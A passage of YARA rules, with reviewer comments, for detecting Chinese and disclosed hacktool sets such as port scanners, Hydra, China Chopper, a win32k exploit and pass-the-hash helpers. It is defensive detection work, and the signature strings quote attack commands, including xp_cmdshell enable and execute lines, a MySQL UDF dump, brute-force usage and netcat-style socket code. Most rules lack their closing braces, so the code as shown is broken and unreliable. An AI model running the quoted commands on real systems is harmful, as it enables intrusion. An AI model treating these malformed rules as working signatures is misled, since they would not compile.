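		$s3 = "Shinysoft Limited0" fullword ascii
		$s4 = "Wellington1" fullword ascii
		$s6 = "Wainuiomata1" fullword ascii
		$s8 = "56 Wright St1" fullword ascii
		$s9 = "UTN-USERFirst-Object" fullword ascii
		$s10 = "New Zealand1" fullword ascii
	condition:
		all of them
}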
rule sql1433_SQL {
   	// Matches on the UTF-16LE VERSIONINFO resource of the MSSQL (port 1433)
   	// scanner: ProductName "1433" and ProductVersion "1,4,3,3", encoded as hex
   	// so the NUL separators between the field name and value are included.
   	// Both resource fields, the MZ header and a 90KB size cap are all required.
   	meta:
   		description = "Chinese Hacktool Set - file SQL.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "025e87deadd1c50b1021c26cb67b76b476fafd64"
   	strings:
   		/* WIDE: ProductName 1433 */
   		$s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 }
   		/* WIDE: ProductVersion 1,4,3,3 */
   		$s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 }
   	condition:
   		uint16(0) == 0x5a4d and filesize < 90KB and all of them
rule RangeScan {
   	// IP-range scanner with HTML report output. $s20 is a plain date/time
   	// format string found in many programs; with "3 of them" it can only be
   	// one of the three, so at least two tool-specific strings are still
   	// needed. No MZ header guard in this older (2014) rule.
   	meta:
   		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
   		author = "Florian Roth"
   		date = "23.11.14"
   		score = 60
   		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
   	strings:
   		$s0 = "RangeScan.EXE" fullword wide
   		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
   		$s9 = "Produced by isn0" fullword ascii
   		$s10 = "RangeScan" fullword wide
   		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii
   	condition:
   		3 of them
rule sig_238_iecv {
   	// iecv.exe is NirSoft's IE cookie viewer/editor (note the nirsoft.cjb.net
   	// URL in $s12), a legitimate admin/forensics utility that was bundled in
   	// the disclosed set. The rule fingerprints the product, not malicious use,
   	// so hits on legitimate installations are expected.
   	meta:
   		description = "Disclosed hacktool set (old stuff) - file iecv.exe"
   		author = "Florian Roth"
   		date = "23.11.14"
   		score = 60
   		hash = "6e6e75350a33f799039e7a024722cde463328b6d"
   	strings:
   		$s1 = "Edit The Content Of Cookie " fullword wide
   		$s3 = "Accessories\\wordpad.exe" fullword ascii
   		$s4 = "gorillanation.com" fullword ascii
   		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
   		$s12 = "http://nirsoft.cjb.net" fullword ascii
   	condition:
   		all of them
rule Dll_LoadEx {
   	// Generic DLL loader GUI; matched on the author tag (WiNrOOt, $s0/$s18),
   	// the module name and its UI messages. 3 of 7 strings plus MZ header and
   	// a 120KB cap.
   	meta:
   		description = "Chinese Hacktool Set - file Dll_LoadEx.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "213d9d0afb22fe723ff570cf69ff8cdb33ada150"
   	strings:
   		$s0 = "WiNrOOt@126.com" fullword wide
   		$s1 = "Dll_LoadEx.EXE" fullword wide
   		$s3 = "You Already Loaded This DLL ! :(" fullword ascii
   		$s10 = "Dll_LoadEx Microsoft " fullword wide
   		$s17 = "Can't Load This Dll ! :(" fullword ascii
   		$s18 = "WiNrOOt" fullword wide
   		$s20 = " Dll_LoadEx(&A)..." fullword wide
   	condition:
   		uint16(0) == 0x5a4d and filesize < 120KB and 3 of them
rule Tools_xport {
   	// xport command-line port scanner (xfocus). Only 2 of 9 strings are
   	// required: $s8/$s9 are xfocus.org attribution strings that other xfocus
   	// tools may carry as well, so a hit on those two alone may indicate a
   	// sibling xfocus tool rather than xport itself.
   	meta:
   		description = "Chinese Hacktool Set - file xport.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "9584de562e7f8185f721e94ee3cceac60db26dda"
   	strings:
   		$s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" fullword ascii
   		$s2 = "Example: xport www.xxx.com 80 -m syn" fullword ascii
   		$s3 = "%s - command line port scanner" fullword ascii
   		$s4 = "xport 192.168.1.1 1-1024 -t 200 -v" fullword ascii
   		$s5 = "Usage: xport <Host> <Ports Scope> [Options]" fullword ascii
   		$s6 = ".\\port.ini" fullword ascii
   		$s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." fullword ascii
   		$s8 = "Code by glacier <glacier@xfocus.org>" fullword ascii
   		$s9 = "http://www.xfocus.org" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 100KB and 2 of them
rule ArtTrayHookDll {
   	// Hook DLL of the ArtTray tray utility: its file name plus the
   	// MSVC-decorated export TerminateHook. Only two strings, both required;
   	// the rule fires on the DLL's presence, not on any behaviour, and the
   	// product itself is a legitimate brigsoft utility.
   	meta:
   		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
   		author = "Florian Roth"
   		date = "23.11.14"
   		score = 60
   		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
   	strings:
   		$s0 = "ArtTrayHookDll.dll" fullword ascii
   		$s7 = "?TerminateHook@@YAXXZ" fullword ascii
   	condition:
   		all of them
rule Dos_ch {
   	// "Churraskito" local privilege escalation (token theft from the WMI
   	// provider host wmiprvse.exe). $s17 is a common goodware string, as the
   	// author notes, and is only one of six with three required, so it cannot
   	// carry a match by itself.
   	meta:
   		description = "Chinese Hacktool Set - file ch.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "60bbb87b08af840f21536b313a76646e7c1f0ea7"
   	strings:
   		$s0 = "/Churraskito/-->Usage: Churraskito.exe \"command\" " fullword ascii
   		$s4 = "fuck,can't find WMI process PID." fullword ascii
   		$s5 = "/Churraskito/-->Found token %s " fullword ascii
   		$s8 = "wmiprvse.exe" fullword ascii
   		$s10 = "SELECT * FROM IIsWebInfo" fullword ascii
   		$s17 = "WinSta0\\Default" fullword ascii  /* Goodware String - occured 22 times */
   	condition:
   		uint16(0) == 0x5a4d and filesize < 260KB and 3 of them
rule EditServer_HackTool {
   	// WinEggDrop backdoor server configurator. Either five of the generic
   	// menu/format strings ($s*) or the single product banner $x1 is enough.
   	// The misspelling in $x1 ("Congirator") is how it appears in the binary
   	// and must not be "corrected".
   	meta:
   		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
   		author = "Florian Roth"
   		date = "23.11.14"
   		score = 60
   		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
   	strings:
   		$s0 = "%s Server.exe" fullword ascii
   		$s1 = "Service Port: %s" fullword ascii
   		$s2 = "The Port Must Been >0 & <65535" fullword ascii
   		$s8 = "3--Set Server Port" fullword ascii
   		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii
   		$s13 = "Service Name: %s" fullword ascii
   		$s14 = "Server Password: %s" fullword ascii
   		$s17 = "Inject Process Name: %s" fullword ascii

   		$x1 = "WinEggDrop Shell Congirator" fullword ascii
   	condition:
   		5 of ($s*) or $x1
rule epathobj_exp32 {
   	// Exploit for the win32k EPATHOBJ/PATHRECORD kernel bug (32-bit build).
   	// Anchored on the PDB path ($s2) and the exploit's console output; all
   	// five strings required, MZ header and 270KB cap.
   	meta:
   		description = "Chinese Hacktool Set - file epathobj_exp32.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "ed86ff44bddcfdd630ade8ced39b4559316195ba"
   	strings:
   		$s0 = "Watchdog thread %d waiting on Mutex" fullword ascii
   		$s1 = "Exploit ok run command" fullword ascii
   		$s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" fullword ascii
   		$s3 = "Alllocated userspace PATHRECORD () %p" fullword ascii
   		$s4 = "Mutex object did not timeout, list not patched" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 270KB and all of them
rule MarathonTool {
   	// Blind SQL injection tool based on heavy queries. $s0 is deliberately
   	// not fullword (it is a substring of other identifiers); $s17/$s18 carry
   	// the specificity. All three required.
   	meta:
   		description = "Chinese Hacktool Set - file MarathonTool.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "084a27cd3404554cc799d0e689f65880e10b59e3"
   	strings:
   		$s0 = "MarathonTool" ascii
   		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
   		$s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" fullword wide
   	condition:
   		uint16(0) == 0x5a4d and filesize < 1040KB and all of them
rule scanms_scanms {
   	// ScanMs: the ISS-published scanner for hosts vulnerable to MS03-026 —
   	// a vendor tool, hence dual-use. $s5 looks like a user-agent fragment and
   	// is weak on its own; 3 of 5 strings are required.
   	meta:
   		description = "Chinese Hacktool Set - file scanms.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "47787dee6ddea2cb44ff27b6a5fd729273cea51a"
   	strings:
   		$s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" fullword ascii
   		$s2 = "Scans for systems vulnerable to MS03-026 vuln" fullword ascii
   		$s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" fullword ascii /* PEStudio Blacklist: os */
   		$s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" fullword ascii
   		$s5 = "Internet Explorer 1.0" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 300KB and 3 of them
rule CN_Toolset__XScanLib_XScanLib_XScanLib {
   	// Super rule over three copies of X-Scan's plugin library. Matched on
   	// the DLL name and its Plug* export names. The strings carry no
   	// ascii/wide modifier, so they match ASCII only (YARA default); that is
   	// appropriate for export-table names.
   	meta:
   		description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll"
   		author = "Florian Roth"
   		reference = "http://qiannao.com/ls/905300366/33834c0c/"
   		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
   		date = "2015/03/30"
   		score = 70
   		super_rule = 1
   		hash0 = "af419603ac28257134e39683419966ab3d600ed2"
   		hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
   		hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822"
   	strings:
   		$s1 = "Plug-in thread causes an exception, failed to alert user." fullword
   		$s2 = "PlugGetUdpPort" fullword
   		$s3 = "XScanLib.dll" fullword
   		$s4 = "PlugGetTcpPort" fullword
   		$s11 = "PlugGetVulnNum" fullword
   	condition:
   		all of them
rule ArtTray_zip_Folder_ArtTray {
   	// Main executable of ArtTray, a legitimate brigsoft tray utility that was
   	// bundled in the disclosed set; expect hits on genuine installations.
   	// Vendor URL, hook-DLL reference and version banner, all required.
   	meta:
   		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
   		author = "Florian Roth"
   		date = "23.11.14"
   		score = 60
   		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
   	strings:
   		$s0 = "http://www.brigsoft.com" fullword wide
   		$s2 = "ArtTrayHookDll.dll" fullword ascii
   		$s3 = "ArtTray Version 1.0 " fullword wide
   		$s16 = "TRM_HOOKCALLBACK" fullword ascii
   	condition:
   		all of them
rule LinuxHacktool_eyes_scanssh {
   	// NOTE(review): none of these strings mention scanssh. $s0-$s5, $s9, $s13
   	// and $s17 look like libssh client error messages, $s6/$s10/$s14/$s15
   	// like glibc resolver-config parser messages and $s8 like a dynamic-loader
   	// message — i.e. the rule fingerprints a statically linked libssh binary,
   	// and any such client may match. reference is "not set".
   	meta:
   		description = "Linux hack tools - file scanssh"
   		author = "Florian Roth"
   		reference = "not set"
   		date = "2015/01/19"
   		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
   	strings:
   		$s0 = "Connection closed by remote host" fullword ascii
   		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
   		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
   		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
   		$s5 = "Server closed connection" fullword ascii
   		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
   		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
   		$s9 = "Remote host closed connection" fullword ascii
   		$s10 = "%s: line %d: bad command `%s'" fullword ascii
   		$s13 = "verifying that server is a known host : file %s not found" fullword ascii
   		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii
   		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
   		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
   	condition:
   		all of them
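rule CookieTools {
   	// Cookie/session manipulation tool. $s2, $s3 and $s8 look like generic
   	// Delphi (Indy) component resource strings that many legitimate Delphi
   	// network applications also contain, so the original "2 of them" could be
   	// satisfied by those alone. The condition now additionally requires at
   	// least one tool-specific string ($s0 or $s12); the sample the rule was
   	// generated from still matches, while unrelated Delphi apps no longer do.
   	meta:
   		description = "Chinese Hacktool Set - file CookieTools.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "b6a3727fe3d214f4fb03aa43fb2bc6fadc42c8be"
   	strings:
   		$s0 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" fullword ascii
   		$s2 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
   		$s3 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
   		$s8 = "OnGetPasswordP" fullword ascii
   		$s12 = "http://www.chinesehack.org/" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 5000KB and 1 of ($s0, $s12) and 2 of them
}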
rule Hacktools_CN_Burst_sql {
   	// SQL brute-force/execution component of the "Burst" toolset: drives an
   	// external s.exe scanner, enables xp_cmdshell on MSSQL and drops a MySQL
   	// UDF via INTO DUMPFILE ($s20). 6 of 9 strings required; no MZ guard.
   	meta:
   		description = "Disclosed hacktool set - file sql.exe"
   		author = "Florian Roth"
   		date = "17.11.14"
   		score = 60
   		hash = "d5139b865e99b7a276af7ae11b14096adb928245"
   	strings:
   		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii
   		$s2 = "s.exe start error...%d" fullword ascii
   		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
   		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
   		$s10 = "Result.txt" fullword ascii
   		$s11 = "Usage:sql.exe [options]" fullword ascii
   		$s17 = "%s root %s %d error" fullword ascii
   		$s18 = "Pass.txt" fullword ascii
   		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
   	condition:
   		6 of them
rule ChinaChopper_caidao {
   	// China Chopper *client* (caidao.exe), not the server-side webshell.
   	// Most strings are fragments from the packed binary (e.g. truncated
   	// "SHAutoComplete"), so the rule is brittle across builds; all six plus
   	// MZ header and a 1077KB cap are required.
   	meta:
   		description = "Chinese Hacktool Set - file caidao.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "056a60ec1f6a8959bfc43254d97527b003ae5edb"
   	strings:
   		$s1 = "Pass,Config,n{)" fullword ascii
   		$s2 = "phMYSQLZ" fullword ascii
   		$s3 = "\\DHLP\\." fullword ascii
   		$s4 = "\\dhlp\\." fullword ascii
   		$s5 = "SHAutoComple" fullword ascii
   		$s6 = "MainFrame" ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 1077KB and all of them
rule iam_iamdll : Toolkit  {
   	// Helper DLL of the Core Security Pass-The-Hash toolkit (iam.exe);
   	// LSASRV.DLL reference plus the ChangeCreds export. The hash in meta is a
   	// SHA256 whereas most rules in this set record SHA1/MD5. Tagged Toolkit.
   	meta:
   		description = "Auto-generated rule - file iamdll.dll"
   		author = "Florian Roth"
   		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
   		date = "2015-07-10"
   		score = 80
   		hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602"
   	strings:
   		$s0 = "LSASRV.DLL" fullword ascii /* score: '21.00' */
   		$s1 = "iamdll.dll" fullword ascii /* score: '21.00' */
   		$s2 = "ChangeCreds" fullword ascii /* score: '12.00' */
   	condition:
   		uint16(0) == 0x5a4d and filesize < 115KB and all of them
rule hydra_7_4_1_hydra {
   	// THC Hydra 7.4.1 Windows build — a widely used, dual-use network
   	// password brute-forcer. All strings are hydra's own usage/error output;
   	// 2 of 6 required, so expect hits on authorised pentest workstations.
   	meta:
   		description = "Chinese Hacktool Set - file hydra.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "3411d0380a1c1ebf58a454765f94d4f1dd714b5b"
   	strings:
   		$s1 = "%d of %d target%s%scompleted, %lu valid password%s found" fullword ascii
   		$s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
   		$s3 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
   		$s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" fullword ascii
   		$s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" fullword ascii
   		$s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them
rule ASPack_Chinese {
   	// Matches an ASPack language .ini (translation) file, not an executable,
   	// which is why there is no MZ check. A hit only shows the packer's
   	// language file was present; it is not evidence of packed malware.
   	meta:
   		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
   		author = "Florian Roth"
   		date = "23.11.14"
   		score = 60
   		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
   	strings:
   		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
   		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
   		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii
   		$s8 = ";  Please, translate text only after simbol '='" fullword ascii
   		$s19 = "= Compress with ASPack" fullword ascii
   	condition:
   		all of them
rule Dos_sys {
   	// Strings carry trailing junk ("Cyg07*2", "[LAG]'J") and a truncated
   	// "'SeDebugPrivilegeOpen ", which suggests they were lifted from a
   	// packed/compressed sample; the rule is brittle across rebuilds and
   	// effectively fingerprints this one build.
   	meta:
   		description = "Chinese Hacktool Set - file sys.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "b5837047443f8bc62284a0045982aaae8bab6f18"
   	strings:
   		$s0 = "'SeDebugPrivilegeOpen " fullword ascii
   		$s6 = "Author: Cyg07*2" fullword ascii
   		$s12 = "from golds7n[LAG]'J" fullword ascii
   		$s14 = "DAMAGE" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 150KB and all of them
rule iKAT_Tool_Generic {
   	// Super rule over three iKAT payloads. The XML-like fields ($s0, $s4,
   	// $s10, $s12, $s14, $s20) look like an embedded self-extractor builder
   	// configuration; $s8 (executor.bat / "once the shell has spawned") is the
   	// tool-specific anchor. All strings are required and match ASCII only.
   	meta:
   		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
   		author = "Florian Roth"
   		date = "05.11.14"
   		score = 55
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
   		super_rule = 1
   		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
   		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
   		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
   	strings:
   		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
   		$s1 = "Failed to read the entire file" fullword
   		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
   		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
   		$s9 = "Running Zip pipeline..." fullword
   		$s10 = "<FinTitle />" fullword
   		$s12 = "<AutoTemp>0</AutoTemp>" fullword
   		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
   		$s15 = "AES Encrypting..." fullword
   		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
   	condition:
   		all of them
rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc {
   	// All four strings are generic self-extractor error messages shared by
   	// the four iKAT payloads; nothing here is specific to the tools
   	// themselves. score = 20 reflects that — expect hits on unrelated
   	// archives built with the same extractor stub.
   	meta:
   		description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe"
   		author = "Florian Roth"
   		date = "05.11.14"
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
   		super_rule = 1
   		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
   		hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014"
   		hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
   		hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349"
   		score = 20
   	strings:
   		$s0 = "Failed to get temp file for source AES decryption" fullword
   		$s5 = "Failed to get encryption header for pwd-protect" fullword
   		$s17 = "Failed to get filetime" fullword
   		$s20 = "Failed to delete temp file for password decoding (3)" fullword
   	condition:
   		all of them
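rule Powershell_Netcat {
   	// PowerShell port of netcat (TcpClient + receive buffer). The original
   	// strings carried no encoding modifier and therefore matched ASCII only;
   	// PowerShell scripts are frequently saved as UTF-16LE, which would have
   	// been missed. "ascii wide" keeps every previous match and adds the
   	// UTF-16LE form. $s0 is a generic parameter attribute and is only
   	// meaningful because all three strings are required.
   	meta:
   		description = "Detects a Powershell version of the Netcat network hacking tool"
   		author = "Florian Roth"
   		score = 60
   		date = "10.10.2014"
   	strings:
   		$s0 = "[ValidateRange(1, 65535)]" fullword ascii wide
   		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword ascii wide
   		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword ascii wide
   	condition:
   		all of them
}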
rule VUBrute_VUBrute {
   	// VNC brute-forcer from the PoS scammer toolbox. $s0 is a standard
   	// file-dialog filter and $s14 a generic file name; the ubrute.com URL
   	// ($s1) and the progress format ($s11) carry the specificity. All four
   	// required.
   	meta:
   		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
   		author = "Florian Roth"
   		date = "22.11.14"
   		score = 70
   		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
   	strings:
   		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
   		$s1 = "http://ubrute.com" fullword ascii
   		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
   		$s14 = "error.txt" fullword ascii
   	condition:
   		all of them
rule pw_inspector_2 {
   	// pw-inspector, the dictionary-trimming helper shipped with THC Hydra
   	// (dual-use). $s4 is its getopt option string, which is specific enough
   	// to justify the 2-of-4 condition together with the MZ/100KB guard.
   	meta:
   		description = "Chinese Hacktool Set - file pw-inspector.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "e0a1117ee4a29bb4cf43e3a80fb9eaa63bb377bf"
   	strings:
   		$s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
   		$s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii
   		$s3 = "PW-Inspector" fullword ascii
   		$s4 = "i:o:m:M:c:lunps" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 100KB and 2 of them
rule Chinese_Hacktool_1014 {
   	// Purpose of the tool is unknown (see description). $s1-$s3 are generic
   	// (common control class, mail header, old IE user-agent); $s0 and $s4
   	// supply the specificity and all five are required. No MZ/filesize
   	// guard, unlike the later rules in this set; hash is an MD5.
   	meta:
   		description = "Detects a chinese hacktool with unknown use"
   		author = "Florian Roth"
   		score = 60
   		date = "10.10.2014"
   		hash = "98c07a62f7f0842bcdbf941170f34990"
   	strings:
   		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
   		$s1 = "msctls_progress32" fullword wide
   		$s2 = "Reply-To: %s" fullword ascii
   		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
   		$s4 = "html htm htx asp" fullword ascii
   	condition:
   		all of them
rule DomainScanV1_0 {
   	// yarGen output on what looks like a packed sample: $s0-$s3 and $s7 are
   	// byte fragments rather than meaningful text, so the rule is effectively
   	// a fingerprint of this one build and will not survive a repack. Strings
   	// have no modifier and no fullword: ASCII substring matches.
   	meta:
   		description = "Auto-generated rule on file DomainScanV1_0.exe"
   		author = "yarGen Yara Rule Generator by Florian Roth"
   		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
   	strings:
   		$s0 = "dIJMuX$aO-EV"
   		$s1 = "XELUxP\"-\\"
   		$s2 = "KaR\"U'}-M,."
   		$s3 = "V.)\\ZDxpLSav"
   		$s4 = "Decompress error"
   		$s5 = "Can't load library"
   		$s6 = "Can't load function"
   		$s7 = "com0tl32:.d"
   	condition:
   		all of them
rule Hacktools_CN_Burst_Start {
   	// Driver batch (Start.bat) of the "Burst" toolset: loops over ip.txt and
   	// launches the Blast/Clear/Thecard batches and a syn scan of port 3306.
   	// 5 of 9 strings required; $s10 is a generic batch line and $s0 a common
   	// for /f idiom, so the Blast.bat lines are what make it specific.
   	meta:
   		description = "Disclosed hacktool set - file Start.bat - DoS tool"
   		author = "Florian Roth"
   		date = "17.11.14"
   		score = 60
   		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
   	strings:
   		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii
   		$s1 = "Blast.bat /r 600" fullword ascii
   		$s2 = "Blast.bat /l Blast.bat" fullword ascii
   		$s3 = "Blast.bat /c 600" fullword ascii
   		$s4 = "start Clear.bat" fullword ascii
   		$s5 = "del Result.txt" fullword ascii
   		$s6 = "s syn %%i %%j 3306 /save" fullword ascii
   		$s7 = "start Thecard.bat" fullword ascii
   		$s10 = "setlocal enabledelayedexpansion" fullword ascii
   	condition:
   		5 of them
rule LinuxHacktool_eyes_screen {
   	// NOTE(review): all eight strings are ordinary GNU screen messages (usage
   	// text, detach/resume help, password-check prompts). This rule therefore
   	// matches a stock `screen` binary — expect a hit on practically every
   	// Linux host that has screen installed. Restrict it by hash or to the
   	// toolkit's directory, or disable it, before endpoint-wide deployment.
   	meta:
   		description = "Linux hack tools - file screen"
   		author = "Florian Roth"
   		reference = "not set"
   		date = "2015/01/19"
   		hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c"
   	strings:
   		$s0 = "or: %s -r [host.tty]" fullword ascii
   		$s1 = "%s: process: character, ^x, or (octal) \\032 expected." fullword ascii
   		$s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." fullword ascii
   		$s6 = "%s: at [identifier][%%|*|#] command [args]" fullword ascii
   		$s8 = "Slurped only %d characters (of %d) into buffer - try again" fullword ascii
   		$s11 = "command from %s: %s %s" fullword ascii
   		$s16 = "[ Passwords don't match - your armor crumbles away ]" fullword ascii
   		$s19 = "[ Passwords don't match - checking turned off ]" fullword ascii
   	condition:
   		all of them
rule IP_Stealing_Utilities {
   	// Two ASCII-only substrings (no modifier, no fullword), both required.
   	// $s0 alone would be far too generic; $s9 is the product name. No MZ
   	// guard, hash is an MD5.
   	meta:
   		description = "Auto-generated rule on file IP Stealing Utilities.exe"
   		author = "yarGen Yara Rule Generator by Florian Roth"
   		hash = "65646e10fb15a2940a37c5ab9f59c7fc"
   	strings:
   		$s0 = "DarkKnight"
   		$s9 = "IPStealerUtilities"
   	condition:
   		all of them
rule CN_Packed_Scanner {
   	// Heuristic, not a signature: CRTDLL.DLL + __GetMainArgs + WS2_32.DLL
   	// describes any small networking binary built with an old lcc/MinGW-style
   	// toolchain, packed or not. The 70-180KB window and score 40 are the only
   	// limiters; there is no MZ check, so non-PE files can match too.
   	meta:
   		description = "Suspiciously packed executable"
   		author = "Florian Roth"
   		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
   		score = 40
   		date = "06.10.2014"
   	strings:
   		$s1 = "kernel32.dll" fullword ascii
   		$s2 = "CRTDLL.DLL" fullword ascii
   		$s3 = "__GetMainArgs" fullword ascii
   		$s4 = "WS2_32.DLL" fullword ascii
   	condition:
   		all of them and filesize < 180KB and filesize > 70KB
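rule QQ_zip_Folder_QQ {
   	// Trojanised/old QQ2000b client from the disclosed set, matched on the
   	// author's e-mail, the module name (ASCII and UTF-16LE) and its registry
   	// key. The original rule declared $s0 and $s1 with an identical value
   	// ("EMAIL:haoq@neusoft.com" fullword wide), which made that one string
   	// count twice toward "5 of them"; the duplicate is removed and the
   	// threshold kept, so five distinct strings are now needed.
   	meta:
   		description = "Disclosed hacktool set (old stuff) - file QQ.exe"
   		author = "Florian Roth"
   		date = "23.11.14"
   		score = 60
   		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
   	strings:
   		$s0 = "EMAIL:haoq@neusoft.com" fullword wide
   		$s4 = "QQ2000b.exe" fullword wide
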